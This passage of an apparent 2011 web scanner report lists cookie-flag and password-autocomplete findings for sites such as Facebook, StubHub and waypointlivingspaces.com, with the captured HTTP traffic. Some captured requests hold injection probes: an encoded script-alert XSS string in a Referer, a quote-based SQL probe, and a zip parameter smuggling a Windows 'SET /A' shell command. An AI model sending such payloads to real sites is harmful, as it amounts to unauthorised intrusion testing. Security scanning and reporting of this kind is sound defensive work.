...[SNIP]...

14.152. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...

14.153. http://www.fansnap.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fansnap.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

vid=1342567440282625; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
lvd=1311101016; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.154. http://www.fastteks.com.asp1-14.websitetestlink.com/css/styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastteks.com.asp1-14.websitetestlink.com
Path:	/css/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-jgcdejoi=A1A4C9B40D872C052684DC61F49939F2; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/styles.css HTTP/1.1
Host: www.fastteks.com.asp1-14.websitetestlink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.fastteks.com/contact-us.php?d5afa%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec2243c61dfa=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: text/css
Date: Tue, 19 Jul 2011 18:22:54 GMT
Accept-Ranges: bytes
ETag: "49247de61fcc1:0"
Set-Cookie: X-Mapping-jgcdejoi=A1A4C9B40D872C052684DC61F49939F2; path=/
Last-Modified: Tue, 31 May 2011 23:00:08 GMT
X-Powered-By: ASP.NET
X-Cache-Info: caching
Content-Length: 12910

/* CSS Document This is a Three Column Fixed Width Center aligned */

@import url("popupSystem.css"); /*Pop-up system*/
@import url("popupStyles.css"); /*Pop-up styles*/

/****************************
...[SNIP]...

14.155. http://www.gamestop.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:04:51 GMT; path=/
CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,3375,4300,4265,3852,4151,4287,3362,4228,4226,4227,3383; path=/
CactusState=V=1&31=True; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:04:51 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:04:51 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,3375,4300,4265,3852,4151,4287,3362,4228,4226,4227,3383; path=/
Set-Cookie: CactusState=V=1&31=True; path=/
Content-Length: 317530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...

14.156. http://www.gamestop.com/Recommendations.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/Recommendations.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:04:47 GMT; path=/
CactusState=V=1&31=False; path=/
RES_TRACKINGID=783322707284241; domain=gamestop.com; expires=Mon, 19-Jul-2021 16:04:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.157. http://www.googleadservices.com/pagead/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Conversion=CoABQ1BILVNuSklsVHJXcE9xaW0wQUhBNmFYMERPYTlzdllCNXBTVXZSZW43b2tOQ0FBUUFTZ0RVSkctMEpENl9fX19fd0ZneVFhZ0FaQ2N1XzhEeUFFQnFnUWRUOUNkNDdxSDgwZjZOeDQ3ZGJYNXkxMWdaZkp5ZHlmZFIzSXJFSWsSEwjez9-GzY2qAhVJceUKHa1uA8cYASDGpIGn_obM2rUBSAE; expires=Thu, 18-Aug-2011 14:20:20 GMT; path=/pagead/conversion/1072614928/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=CPH-SnJIlTrWpOqim0AHA6aX0DOa9svYB5pSUvRen7okNCAAQASgDUJG-0JD6_____wFgyQagAZCcu_8DyAEBqgQdT9Cd47qH80f6Nx47dbX5y11gZfJydyfdR3IrEIk&ved=0CDcQ0Qw&val=ChAzODFiZTJhNWE0ZTMyMWRlELL2tO4EGggBbvQez3VW6SABKAAw28LpkrLIlPUXOMbC9O4EQMntjPEE&sig=AOD64_2UaZJABDJ5NxcdREK4EGt-3pUxCg&adurl=http://www.atlassian.com/software/jira HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CoABQ1BILVNuSklsVHJXcE9xaW0wQUhBNmFYMERPYTlzdllCNXBTVXZSZW43b2tOQ0FBUUFTZ0RVSkctMEpENl9fX19fd0ZneVFhZ0FaQ2N1XzhEeUFFQnFnUWRUOUNkNDdxSDgwZjZOeDQ3ZGJYNXkxMWdaZkp5ZHlmZFIzSXJFSWsSEwjez9-GzY2qAhVJceUKHa1uA8cYASDGpIGn_obM2rUBSAE; expires=Thu, 18-Aug-2011 14:20:20 GMT; path=/pagead/conversion/1072614928/
Cache-Control: private
Location: http://www.atlassian.com/software/jira?gclid=CN7P34bNjaoCFUlx5QodrW4Dxw
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 19 Jul 2011 14:20:20 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block

14.158. http://www.nne.aaa.com/en-nne/Pages/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nne.aaa.com
Path:	/en-nne/Pages/Home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

acezipcode=36|AAA|05672; expires=Thu, 19-Jul-2012 19:04:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.159. http://www.stubhub.com/TeaLeafTarget.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=379551A8B23610B2DCD699373A2BF429; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.160. http://www.stubhub.com/assets/default.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/assets/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=E551BC2EB23510B2DFDBC89D01B99543; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.161. http://www.stubhub.com/content/getPromoContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/content/getPromoContent

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=01333828B23610B20B11F351420A2498; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.162. http://www.stubhub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=02B35B92B23610B2CDDBD1ECACF16CE8; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.163. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/promotions/scratch/foresee_v1/foresee-dhtml-popup.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=EC632AD4B23510B2E9D1AE6611395988; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.164. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/promotions/scratch/foresee_v1/foresee-dhtml.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=EC5CA25EB23510B2D4AA9F0FE0F99B10; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.165. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/promotions/scratch/foresee_v1/foresee-surveydef.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=EB2903FAB23510B2F895E17C95DDB51E; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.166. http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/resources/mojito/img/common/welcome_banner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.167. http://www.ticketmaster.com/json/menu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketmaster.com
Path:	/json/menu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LANGUAGE=en-us; path=/; domain=.ticketmaster.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.168. http://www.ticketmaster.com/json/search/genremenu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketmaster.com
Path:	/json/search/genremenu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LANGUAGE=en-us; path=/; domain=.ticketmaster.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

15. Password field with autocomplete enabled previous next
There are 29 instances of this issue:

http://digg.com/submit
http://forum.redbyte.ro/
http://manager.linode.com/
https://signin.ebay.com/ws/eBayISAPI.dll
http://waypointlivingspaces.com/function.mysql-connect
http://waypointlivingspaces.com/locate-dealer
http://waypointlivingspaces.com/locate-dealer
http://waypointlivingspaces.com/locate-dealer
http://waypointlivingspaces.com/locate-dealer
http://waypointlivingspaces.com/user
http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html
http://www.facebook.com/advertising/
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/badges/
http://www.facebook.com/careers/
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/find-friends
http://www.facebook.com/help/
http://www.facebook.com/mobile/
http://www.facebook.com/pages/create.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/terms.php
http://www.livedrive.com/SignupToLivedrive
http://www.myspace.com/auth/loginform
http://www.nne.aaa.com/en-nne/Pages/Home.aspx

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

15.1. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.2. http://forum.redbyte.ro/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.redbyte.ro
Path:	/

Issue detail

The page contains a form with the following action URL:

http://forum.redbyte.ro/login.aspx

The form contains the following password field with autocomplete enabled:

parola

Request

Response

15.3. http://manager.linode.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://manager.linode.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://manager.linode.com/session/login

The form contains the following password field with autocomplete enabled:

auth_password

Request

GET / HTTP/1.1
Host: manager.linode.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 15:14:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 3433

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>Linode Login</title>
<link rel="sty
...[SNIP]...
<br>

<form name="CFForm_1" id="CFForm_1" action="https://manager.linode.com/session/login" method="post" onsubmit="return _CF_checkCFForm_1(this)"> <input name="redirectHint" id="redirectHint" type="hidden" />
...[SNIP]...
<td><input name="auth_password" id="auth_password" type="password" maxlength="128" tabindex="2" class="input" size="24" border="0" /></td>
...[SNIP]...

15.4. https://signin.ebay.com/ws/eBayISAPI.dll previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://signin.ebay.com
Path:	/ws/eBayISAPI.dll

Issue detail

The page contains a form with the following action URL:

https://signin.ebay.com/ws/eBayISAPI.dll?co_partnerId=2&siteid=0&UsingSSL=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.5. http://waypointlivingspaces.com/function.mysql-connect previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/function.mysql-connect

Issue detail

The page contains a form with the following action URL:

http://waypointlivingspaces.com/function.mysql-connect?destination=function.mysql-connect

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.6. http://waypointlivingspaces.com/locate-dealer previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/locate-dealer

Issue detail

The page contains a form with the following action URL:

http://waypointlivingspaces.com/locate-dealer?destination=node%2F1456

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.7. http://waypointlivingspaces.com/locate-dealer previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/locate-dealer

Issue detail

The page contains a form with the following action URL:

http://waypointlivingspaces.com/locate-dealer?destination=node%2F1456%3Fzip%3D10010

The form contains the following password field with autocomplete enabled:

pass

Request

GET /locate-dealer?zip=10010 HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

15.8. http://waypointlivingspaces.com/locate-dealer previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/locate-dealer

Issue detail

The page contains a form with the following action URL:

http://waypointlivingspaces.com/locate-dealer?destination=node%2F1456%3Fzip%3D%252527

The form contains the following password field with autocomplete enabled:

pass

Request

GET /locate-dealer?zip=%2527 HTTP/1.1
Host: waypointlivingspaces.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=02isqjnj84clkgrigupugsjs41; has_js=1; __utma=150814896.1501451648.1311108783.1311108783.1311108783.1; __utmb=150814896.4.9.1311108916173; __utmc=150814896; __utmz=150814896.1311108783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:59:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:59:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/locate-dealer?destination=node%2F1456%3Fzip%3D%252527" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.9. http://waypointlivingspaces.com/locate-dealer previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/locate-dealer

Issue detail

The page contains a form with the following action URL:

http://waypointlivingspaces.com/locate-dealer?destination=node%2F1456%3Fzip%3D%2522%2526%2520SET%2520%252FA%25200xFFF9999-2%2520%2526

The form contains the following password field with autocomplete enabled:

pass

Request

GET /locate-dealer?zip=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Host: waypointlivingspaces.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:53:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:53:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/locate-dealer?destination=node%2F1456%3Fzip%3D%2522%2526%2520SET%2520%252FA%25200xFFF9999-2%2520%2526" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.10. http://waypointlivingspaces.com/user previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/user

Issue detail

The page contains a form with the following action URL:

http://waypointlivingspaces.com/user

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.11. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.boston.com
Path:	/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The page contains a form with the following action URL:

http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.12. http://www.facebook.com/advertising/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/advertising/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.13. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.14. http://www.facebook.com/badges/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.15. http://www.facebook.com/careers/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.16. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.17. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.18. http://www.facebook.com/facebook previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.19. http://www.facebook.com/find-friends previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.20. http://www.facebook.com/help/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
